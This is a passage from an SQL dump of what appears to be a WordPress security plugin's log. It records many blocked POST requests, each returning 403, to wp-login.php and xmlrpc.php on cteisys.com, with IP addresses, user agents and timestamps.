SV1)\"}','cr7Dj3g5lZ9wFEz8NoPvRWHq',0,1663949080.4846,343,'','GET',403,0,700,0,1,'',0),('212.16.164.132',3557860484,'','http://cteisys.com/old-index.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','aDUZJuNhY4kFrtpObwPi0ldI',0,1663949204.0246,290,'','GET',403,0,700,0,1,'',0),('159.89.207.135',2673463175,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','bA81GZzrpdtenI4CV60kQUST',0,1663949266.1328,1306,'','POST',403,0,600,0,1,'',0),('47.115.24.165',796072101,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','pEUlDZ8CS3TFNufvPQcqMWxL',0,1663949308.7872,1246,'','POST',403,0,600,0,1,'',0),('51.83.37.23',861086999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XRf2SztMh6Aj5BrVilywQoam',0,1663949712.8126,18361,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iR7z3HkwAPTgthWs8vecoG4Q',0,1663950157.6166,512,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','edhopfAD0QqbPYmZ2HGX9Jks',0,1663950569.9859,8184,'','POST',403,0,515,0,1,'',0),('107.175.111.233',1806659561,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ydkBHSLsp3lh1PUAG2xVMiKq',0,1663950717.7897,1649,'','POST',403,0,600,0,1,'',0),('213.152.161.138',3583549834,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DWiFKy8mdLOwlT9rvJscXG5C',0,1663950742.6859,593,'','POST',403,0,515,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','ZvNpmS58RrlFJWhMa7Yx46Ct',0,1663950760.8589,593,'','POST',403,0,600,0,1,'',0),('142.132.233.34',2391075106,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','giTrFycVvRXLdH1z3JOfp7SM',0,1663950801.4588,467,'','POST',403,0,600,0,1,'',0),('142.132.233.34',2391075106,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Yg9qvyN4bUz68p0V3WfOacjd',0,1663950802.7582,512,'','POST',403,0,600,0,1,'',0),('45.77.125.145',760053137,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','L0hJfVqpBXgCdx1sYZHIoFi7',0,1663950812.1277,480,'','POST',403,0,600,0,1,'',0),('45.77.125.145',760053137,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ZjvpurAOik0tf1XnK2cbMmga',0,1663950812.8640,497,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','vNEQGtapgHdT5JxAu7UYnfS3',0,1663951053.1567,1193,'','POST',403,0,600,0,1,'',0),('159.65.147.193',2671875009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IOBEDNFMoQZy79RTl8V0vCkb',0,1663951310.2241,1555,'','POST',403,0,515,0,1,'',0),('162.241.253.243',2733768179,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c7iEKQmC1eBbFLXguDwASPsT',0,1663951672.3133,13851,'','POST',403,0,515,0,1,'',0),('213.152.162.99',3583550051,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ls5U6WpYCa17NRwV43HJd8Ak',0,1663951968.6503,1592,'','POST',403,0,515,0,1,'',0),('107.180.107.103',1806986087,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I4k0gnd5ZNE2iVYFc3m8u9SK',0,1663951970.9992,558,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','y48gOzBW0SMxDv23wjKRtq5d',0,1663952152.7354,1250,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','eBbIhHpEPnA5WlKJyLvGZ7wS',0,1663952193.7275,479,'','POST',403,0,600,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','njcJY8kPHXex0FaBuzZlgmDK',0,1663956159.2472,1287,'','POST',403,0,515,0,1,'',0),('168.119.80.254',2826391806,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','7JaOwKfC3MmgGurF6SsN51DR',0,1663956377.9946,1248,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','sYSWN2pdMHDek4T7F6tLvb0j',0,1663956418.7401,1348,'','POST',403,0,600,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eyLj9oBrHAZhQiu46W23ObaD',0,1663956473.9804,1239,'','POST',403,0,515,0,1,'',0),('192.169.177.64',3232346432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','35syHpbawuI24zjBoEnfXhYA',0,1663956788.2927,1386,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','DAwmj18VGxS0TPMfagORur5F',0,1663956803.0902,566,'','POST',403,0,600,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GRBMrCqHme5E4No1zlaf803S',0,1663957431.0161,1413,'','POST',403,0,515,0,1,'',0),('217.138.252.123',3649764475,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0n7vwG2RqSOgjH4s91XAyrNt',0,1663957518.9552,1297,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I8OidoJWfcxYBmPNsj09wUbg',0,1663957706.0879,1172,'','POST',403,0,515,0,1,'',0),('134.19.179.195',2249438147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2EAxR8XjChpo0Ji5B1rIQHsV',0,1663957715.9361,582,'','POST',403,0,515,0,1,'',0),('162.144.87.29',2727368477,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','7ibZQxUA3uVNsaE04XyDmvKf',0,1663957754.2623,1244,'','POST',403,0,600,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','xY1bn3jAP2WFchG0tIpdHska',0,1663957796.0091,1215,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','aL6omNEPyX0JWQKet1jqSscw',0,1663957901.7222,617,'','POST',403,0,600,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8WcD0ZHx7dNLRK4wmprYCPsv',0,1663958024.3349,1284,'','POST',403,0,515,0,1,'',0),('85.128.143.142',1434488718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2Jk9YWd8a4Iv1Rphr3zsoCSc',0,1663958303.3400,1397,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mxEeJkSn6MIY7RaB8TjrFszU',0,1663958619.6417,1286,'','POST',403,0,515,0,1,'',0),('94.136.71.71',1585989447,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','wyNBmWG04JjOg6S8xbX3EHF5',0,1663958850.0881,539,'','POST',403,0,600,0,1,'',0),('94.136.71.71',1585989447,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','AhDcPkCQjaNVHLBp1tUvYw8O',0,1663958851.5462,469,'','POST',403,0,600,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','uYcdkQj2JTmXhNVlRaWMvtPB',0,1663959113.7028,1253,'','POST',403,0,600,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','1jcaypOTYUZMXu5Po8tsEK2b',0,1663959154.3218,518,'','POST',403,0,600,0,1,'',0),('54.36.110.109',908357229,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1prhe3g7dT2XFPCOlKZtYfuj',0,1663959191.0724,1258,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BLyh1Q0XJrx2n4HAUTkjP5bz',0,1663959480.8972,1304,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','64QiUTMa0cepJI8DXZS9rLWB',0,1663960080.8124,3647,'','POST',403,0,515,0,1,'',0),('157.245.38.42',2650089002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ag6KIzlPfk25TtB3piNovJQ8',0,1663960376.4188,1761,'','POST',403,0,515,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','DBwTPqbJS1nQNfFOGHCZ3ecy',0,1663960476.8706,1289,'','POST',403,0,600,0,1,'',0),('192.99.201.91',3227765083,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','MAmr0d5gxhRabJ2YvXqFEl3P',0,1663960516.4760,2087,'','POST',403,0,600,0,1,'',0),('142.93.170.99',2388503139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7JH8nqMCFoOZlfhzBNID5UeS',0,1663960680.2058,2672,'','POST',403,0,515,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rxaMR1y9SPw6FlH3ECibjYKN',0,1663960913.2027,1509,'','POST',403,0,515,0,1,'',0),('162.214.155.200',2731973576,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','37qNKrILxeb8Y9sukQJlcyWp',0,1663961329.4650,10185,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8NpI1tBdOGEHcgWMk2obu4ie',0,1663961631.0828,1417,'','POST',403,0,515,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','pBbzEDqL4ArTCZNPXg3dHlSa',0,1663961834.2969,2207,'','POST',403,0,600,0,1,'',0),('67.205.39.9',1137518345,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','F1mjafEHuQeWXwk3NpVMPogI',0,1663961874.1797,1220,'','POST',403,0,600,0,1,'',0),('139.59.20.111',2335904879,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hOXmuQvTcqglEUYaSFnojpkC',0,1663961954.5520,1351,'','POST',403,0,515,0,1,'',0),('89.253.233.129',1509812609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','EIM1JtDCmsPbfT2QxrFaV30e',0,1663961999.3807,504,'','POST',403,0,600,0,1,'',0),('89.253.233.129',1509812609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','l9cXuHVYAi6Qq1Jfgw0MoDNC',0,1663962004.3842,746,'','POST',403,0,600,0,1,'',0),('128.199.80.18',2160545810,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZOkQ7dHxP6bunDXAGBwt4FzN',0,1663962272.6047,18468,'','POST',403,0,515,0,1,'',0),('77.244.214.239',1307891439,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','0SuC9LUnzvcDZ4YgVh23bmT1',0,1663962334.8530,622,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','vsJWHCj4cAU8enBtVFozaK9p',0,1663962738.6920,1292,'','POST',403,0,600,0,1,'',0),('51.38.113.53',858157365,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eHJzoEi7hfMGYq8gAarks6um',0,1663962761.3608,503,'','POST',403,0,515,0,1,'',0),('45.162.228.171',765650091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GVtKfXdHMDs7Tzy0xZweNFU2',0,1663962904.6474,1847,'','POST',403,0,515,0,1,'',0),('61.219.171.85',1037806421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Cpcl8RjZdqTunAogk9OEVBL1',0,1663963140.7400,1227,'','POST',403,0,515,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','HbekOzrosKNvXC9VUtT8qES2',0,1663963205.8486,1655,'','POST',403,0,600,0,1,'',0),('61.219.43.253',1037773821,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','FQNTswDyIY8zoX4mcPLW6gt0',0,1663963246.3011,1283,'','POST',403,0,600,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EPfBAkuaNse4Qr98Clh3ivWg',0,1663963448.7517,1300,'','POST',403,0,515,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','8vVI07zZPR2YoF5WgaUHEmDb',0,1663964145.7223,8438,'','POST',403,0,600,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','lLQfxFMKAXdj3hDPsvykuU1Z',0,1663965181.8386,9569,'','POST',403,0,600,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','IyGEnw0tFAqbXSWTxm3sldMJ',0,1663966220.3459,1304,'','POST',403,0,600,0,1,'',0),('178.162.209.171',2997014955,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uSJaev249xLBrgmlyVQ1itwY',0,1663966625.1363,18464,'','POST',403,0,515,0,1,'',0),('165.22.202.244',2769734388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','WV2L3YArEIkfdco6Ov9pC8FJ',0,1663966761.7787,464,'','POST',403,0,600,0,1,'',0),('165.22.202.244',2769734388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','XbEZ2RHtY7z6sjJoAxrkhP8d',0,1663966763.0860,463,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','2aWhkIrD78uxbGotJ1VO9UTE',0,1663967256.7582,7256,'','POST',403,0,600,0,1,'',0),('152.89.160.131',2556010627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ogM9sLyIFQGAdxVt1rzJSuBw',0,1663967707.5363,14893,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vICuV1BDWpqbtsLxzT5SEiec',0,1663967854.1312,1274,'','POST',403,0,515,0,1,'',0),('88.212.236.252',1490349308,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','b93die0CpxJ5hz4lZc2VtaQ1',0,1663968289.6582,18033,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','aXFRce4oDfvZGzB1Txhb9rup',0,1663969313.6673,17479,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','Qw9KeCjxJTyP1oYX5B4vm2ad',0,1663970346.9173,17042,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','5NJPBcxZ6TkvVQKerHMthAlU',0,1663971379.5425,2673,'','POST',403,0,600,0,1,'',0),('88.212.236.252',1490349308,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','kHFo2aIeCld8hRzKmNQLiXtZ',0,1663972412.5543,18478,'','POST',403,0,600,0,1,'',0),('213.152.162.10',3583549962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nOhjwQyaJNVempBKi5rL1GbF',0,1663972463.4225,2360,'','POST',403,0,515,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','oDacZHCw9lf4N3e5k062XK1J',0,1663973454.7753,18101,'','POST',403,0,600,0,1,'',0),('82.218.176.68',1390063684,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','fCYgQkm3F0RUvwxby8hlu21r',0,1663974050.6495,455,'','POST',403,0,600,0,1,'',0),('82.218.176.68',1390063684,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 